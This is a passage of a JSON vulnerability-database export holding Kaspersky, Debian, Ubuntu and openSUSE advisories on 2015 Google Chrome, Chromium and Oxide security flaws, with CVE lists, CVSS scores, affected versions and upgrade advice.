"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2020-06-18T00:00:00", "id": "KLA10585", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10585/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:25:34", "description": "### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, cause denial of service or possible execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.90\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/c>)\n\n### *Original advisories*:\n[Google update new](<http://googlechromereleases.blogspot.ru/2015/04/stable-channel-update_14.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1240](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1240>)5.0Critical \n[CVE-2015-1238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1238>)7.5Critical \n[CVE-2015-1245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1245>)6.8High \n[CVE-2015-1244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1244>)5.0Critical \n[CVE-2015-1242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1242>)7.5Critical \n[CVE-2015-1241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241>)4.3Warning \n[CVE-2015-1249](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1249>)7.5Critical \n[CVE-2015-1248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1248>)4.3Warning \n[CVE-2015-1247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1247>)5.0Critical \n[CVE-2015-1246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1246>)5.0Critical \n[CVE-2015-1236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1236>)4.3Warning \n[CVE-2015-1237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1237>)7.5Critical \n[CVE-2015-1235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1235>)5.0Critical", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "kaspersky", "title": "KLA10546 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249"], "modified": "2020-06-03T00:00:00", "id": "KLA10546", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10546/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:25:13", "description": "### *Detect date*:\n04/28/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nUse-after-free and other vulnerabilities were found in Google Chrome. By exploiting these vulnerabilities malicious users can cause denial of service or conduct other unknown impacts. These vulnerabilities can be exploited remotely via an unknown vectors.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.135\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google blog entry](<http://googlechromereleases.blogspot.ru/2015/04/stable-channel-update_28.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1243>)7.5Critical \n[CVE-2015-1250](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1250>)7.5Critical", "cvss3": {}, "published": "2015-04-28T00:00:00", "type": "kaspersky", "title": "KLA10567 Denial of service vulnerability in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2020-06-03T00:00:00", "id": "KLA10567", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10567/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T11:25:56", "description": "### *Detect date*:\n04/01/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code or have other unknown impact.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 41.0.2272.118\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk.\n\n### *Original advisories*:\n[Google Chrome blog post](<http://googlechromereleases.blogspot.ru/2015/04/stable-channel-update.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1234>)6.8High \n[CVE-2015-1233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1233>)7.5Critical", "cvss3": {}, "published": "2015-04-01T00:00:00", "type": "kaspersky", "title": "KLA10524 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2020-06-03T00:00:00", "id": "KLA10524", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10524/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:06:51", "description": "\nSeveral vulnerabilities were discovered in the chromium web browser.\n\n\n* [CVE-2015-1251](https://security-tracker.debian.org/tracker/CVE-2015-1251)\nSkyLined discovered a use-after-free issue in speech \n recognition.\n* [CVE-2015-1252](https://security-tracker.debian.org/tracker/CVE-2015-1252)\nAn out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n* [CVE-2015-1253](https://security-tracker.debian.org/tracker/CVE-2015-1253)\nA cross-origin bypass issue was discovered in the DOM parser.\n* [CVE-2015-1254](https://security-tracker.debian.org/tracker/CVE-2015-1254)\nA cross-origin bypass issue was discovered in the DOM editing \n feature.\n* [CVE-2015-1255](https://security-tracker.debian.org/tracker/CVE-2015-1255)\nKhalil Zhani discovered a use-after-free issue in WebAudio.\n* [CVE-2015-1256](https://security-tracker.debian.org/tracker/CVE-2015-1256)\nAtte Kettunen discovered a use-after-free issue in the SVG\n implementation.\n* [CVE-2015-1257](https://security-tracker.debian.org/tracker/CVE-2015-1257)\nmiaubiz discovered an overflow issue in the SVG implementation.\n* [CVE-2015-1258](https://security-tracker.debian.org/tracker/CVE-2015-1258)\ncloudfuzzer discovered an invalid size parameter used in the\n libvpx library.\n* [CVE-2015-1259](https://security-tracker.debian.org/tracker/CVE-2015-1259)\nAtte Kettunen discovered an uninitialized memory issue in the\n pdfium library.\n* [CVE-2015-1260](https://security-tracker.debian.org/tracker/CVE-2015-1260)\nKhalil Zhani discovered multiple use-after-free issues in chromium's\n interface to the WebRTC library.\n* [CVE-2015-1261](https://security-tracker.debian.org/tracker/CVE-2015-1261)\nJuho Nurminen discovered a URL bar spoofing issue.\n* [CVE-2015-1262](https://security-tracker.debian.org/tracker/CVE-2015-1262)\nmiaubiz discovered the use of an uninitialized class member in\n font handling.\n* [CVE-2015-1263](https://security-tracker.debian.org/tracker/CVE-2015-1263)\nMike Ruddy discovered that downloading the spellcheck dictionary\n was not done over HTTPS.\n* [CVE-2015-1264](https://security-tracker.debian.org/tracker/CVE-2015-1264)\nK0r3Ph1L discovered a cross-site scripting issue that could be\n triggered by bookmarking a site.\n* [CVE-2015-1265](https://security-tracker.debian.org/tracker/CVE-2015-1265)\nThe chrome 43 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.3.61.21.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 43.0.2357.65-1~deb8u1.\n\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 43.0.2357.65-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2022-08-10T07:06:46", "id": "OSV:DSA-3267-1", "href": "https://osv.dev/vulnerability/DSA-3267-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:10:30", "description": "\nSeveral vulnerabilities were discovered in the chromium web browser.\n\n\n* [CVE-2015-1235](https://security-tracker.debian.org/tracker/CVE-2015-1235)\nA Same Origin Policy bypass issue was discovered in the HTML \n parser.\n* [CVE-2015-1236](https://security-tracker.debian.org/tracker/CVE-2015-1236)\nAmitay Dobo discovered a Same Origin Policy bypass in the Web Audio \n API.\n* [CVE-2015-1237](https://security-tracker.debian.org/tracker/CVE-2015-1237)\nKhalil Zhani discovered a use-after-free issue in IPC.\n* [CVE-2015-1238](https://security-tracker.debian.org/tracker/CVE-2015-1238)\ncloudfuzzer discovered an out-of-bounds write in the skia \n library.\n* [CVE-2015-1240](https://security-tracker.debian.org/tracker/CVE-2015-1240)\nw3bd3vil discovered an out-of-bounds read in the WebGL \n implementation.\n* [CVE-2015-1241](https://security-tracker.debian.org/tracker/CVE-2015-1241)\nPhillip Moon and Matt Weston discovered a way to trigger local user\n interface actions remotely via a crafted website.\n* [CVE-2015-1242](https://security-tracker.debian.org/tracker/CVE-2015-1242)\nA type confusion issue was discovered in the v8 javascript \n library.\n* [CVE-2015-1244](https://security-tracker.debian.org/tracker/CVE-2015-1244)\nMike Ruddy discovered a way to bypass the HTTP Strict Transport Security\n policy.\n* [CVE-2015-1245](https://security-tracker.debian.org/tracker/CVE-2015-1245)\nKhalil Zhani discovered a use-after-free issue in the pdfium \n library.\n* [CVE-2015-1246](https://security-tracker.debian.org/tracker/CVE-2015-1246)\nAtte Kettunen discovered an out-of-bounds read issue in \n webkit/blink.\n* [CVE-2015-1247](https://security-tracker.debian.org/tracker/CVE-2015-1247)\nJann Horn discovered that file: URLs in OpenSearch documents were not\n sanitized, which could allow local files to be read remotely when using\n the OpenSearch feature from a crafted website.\n* [CVE-2015-1248](https://security-tracker.debian.org/tracker/CVE-2015-1248)\nVittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\n which could allow the remote execution of a downloaded executable \n file.\n* [CVE-2015-1249](https://security-tracker.debian.org/tracker/CVE-2015-1249)\nThe chrome 41 development team found various issues from internal\n fuzzing, audits, and other studies.\n* [CVE-2015-3333](https://security-tracker.debian.org/tracker/CVE-2015-3333)\nMultiple issues were discovered and fixed in v8 4.2.7.14.\n* [CVE-2015-3334](https://security-tracker.debian.org/tracker/CVE-2015-3334)\nIt was discovered that remote websites could capture video data from\n attached web cameras without permission.\n* [CVE-2015-3336](https://security-tracker.debian.org/tracker/CVE-2015-3336)\nIt was discovered that remote websites could cause user interface\n disruptions like window fullscreening and mouse pointer locking.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.90-1~deb8u1.\n\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 42.0.2311.90-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {}, "published": "2015-04-26T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333", "CVE-2015-3334", "CVE-2015-3336"], "modified": "2022-08-10T07:10:28", "id": "OSV:DSA-3238-1", "href": "https://osv.dev/vulnerability/DSA-3238-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:27:23", "description": "\nSeveral vulnerabilities were discovered in the chromium web browser:\n\n\n* [CVE-2015-1243](https://security-tracker.debian.org/tracker/CVE-2015-1243)\nSaif El-Sherei discovered a use-after-free issue.\n* [CVE-2015-1250](https://security-tracker.debian.org/tracker/CVE-2015-1250)\nThe chrome 42 team found and fixed multiple issues during internal\n auditing.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.135-1~deb8u1.\n\n\nFor the testing distribution (stretch), this problem will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 42.0.2311.135-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2022-07-21T05:48:39", "id": "OSV:DSA-3242-1", "href": "https://osv.dev/vulnerability/DSA-3242-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T12:40:20", "description": "Several security issues were discovered in the DOM implementation in \nBlink. If a user were tricked in to opening a specially crafted website, \nan attacker could potentially exploit these to bypass Same Origin Policy \nrestrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in \nChromium. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to cause a denial of \nservice via renderer crash, or execute arbitrary code with the privileges \nof the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash, or execute arbitrary code with the privileges of the sandboxed \nrender process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit this to cause a denial of service via renderer crash, or execute \narbitrary code with the privileges of the sandboxed render process. \n(CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC \nimplementation in Chromium. If a user were tricked in to opening a \nspecially crafted website, an attacker could potentially exploit these to \ncause a denial of service via renderer crash, or execute arbitrary code \nwith the privileges of the sandboxed render process. (CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in \nBlink. If a user were tricked in to opening a specially crafted website, \nan attacker could potentially exploit this to cause a denial of service \nvia renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit these to read uninitialized memory, cause a denial of service via \nrenderer crash or execute arbitrary code with the privileges of the \nsandboxed render process. (CVE-2015-3910)\n", "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3910", "CVE-2015-1265", "CVE-2015-1258", "CVE-2015-1260", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1253", "CVE-2015-1262"], "modified": "2015-05-21T00:00:00", "id": "USN-2610-1", "href": "https://ubuntu.com/security/notices/USN-2610-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T23:23:23", "description": "An issue was discovered in the HTML parser in Blink. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to bypass same-origin restrictions. \n(CVE-2015-1235)\n\nAn issue was discovered in the Web Audio API implementation in Blink. If \na user were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to bypass same-origin restrictions. \n(CVE-2015-1236)\n\nA use-after-free was discovered in Chromium. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer crash, or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2015-1237)\n\nAn out-of-bounds write was discovered in Skia. If a user were tricked in \nto opening a specially crafted website, an attacker could potentially \nexploit this to cause a denial of service via application crash or execute \narbitrary code with the privileges of the user invoking the program. \n(CVE-2015-1238)\n\nAn out-of-bounds read was discovered in the WebGL implementation. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash. (CVE-2015-1240)\n\nAn issue was discovered with the interaction of page navigation and touch \nevent handling. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to conduct \n\"tap jacking\" attacks. (CVE-2015-1241)\n\nA type confusion bug was discovered in V8. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer crash, or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2015-1242)\n\nIt was discovered that websocket connections were not upgraded whenever a \nHSTS policy is active. A remote attacker could potentially exploit this \nto conduct a machine-in-the-middle (MITM) attack. (CVE-2015-1244)\n\nAn out-of-bounds read was discovered in Blink. If a user were tricked in \nto opening a specially crafted website, an attacker could potentially \nexploit this to cause a denial of service via renderer crash. \n(CVE-2015-1246)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1249)\n\nA use-after-free was discovered in the file picker implementation. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via \napplication crash or execute arbitrary code with the privileges of the \nuser invoking the program. (CVE-2015-1321)\n\nMultiple security issues were discovered in V8. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit these to read uninitialized memory, cause a denial of service via \nrenderer crash or execute arbitrary code with the privileges of the \nsandboxed render process. (CVE-2015-3333)\n", "cvss3": {}, "published": "2015-04-27T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1241", "CVE-2015-1240", "CVE-2015-1244", "CVE-2015-1321", "CVE-2015-3333", "CVE-2015-1235", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1246", "CVE-2015-1249"], "modified": "2015-04-27T00:00:00", "id": "USN-2570-1", "href": "https://ubuntu.com/security/notices/USN-2570-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T12:40:50", "description": "A use-after-free was discovered in the DOM implementation in Blink. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash, or execute arbitrary code with the privileges of the sandboxed \nrender process. (CVE-2015-1243)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1250)\n", "cvss3": {}, "published": "2015-05-06T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2015-05-06T00:00:00", "id": "USN-2582-1", "href": "https://ubuntu.com/security/notices/USN-2582-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-04T12:42:26", "description": "It was discovered that Chromium did not properly handle the interaction \nof IPC, the gamepad API and V8. If a user were tricked in to opening a \nspecially crafted website, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking the \nprogram. (CVE-2015-1233)\n\nA buffer overflow was discovered in the GPU service. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to cause a denial of service via application \ncrash. (CVE-2015-1234)\n\nIt was discovered that Oxide did not correctly manage the lifetime of \nBrowserContext, resulting in a potential use-after-free in some \ncircumstances. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to cause a denial of \nservice via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1317)\n", "cvss3": {}, "published": "2015-04-07T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1317", "CVE-2015-1233", "CVE-2015-1234"], "modified": "2015-04-07T00:00:00", "id": "USN-2556-1", "href": "https://ubuntu.com/security/notices/USN-2556-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:26:30", "description": "Chromium was updated to 41.0.2272.118 to fix two security issues.\n\n The following vulnerabilities were fixed:\n\n\n * A combination of V8, Gamepad and IPC bugs could lead to remote code\n execution outside of the sandbox (CVE-2015-1233, boo#925713)\n * Buffer overflow via race condition in GPU (CVE-2015-1234, boo#925714)\n\n", "cvss3": {}, "published": "2015-04-08T16:06:12", "type": "suse", "title": "Security update for Chromium (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2015-04-08T16:06:12", "id": "OPENSUSE-SU-2015:0682-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00004.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:16:35", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly\ninitialize memory, which allows remote attackers to cause a denial of\nservice or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1259", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": 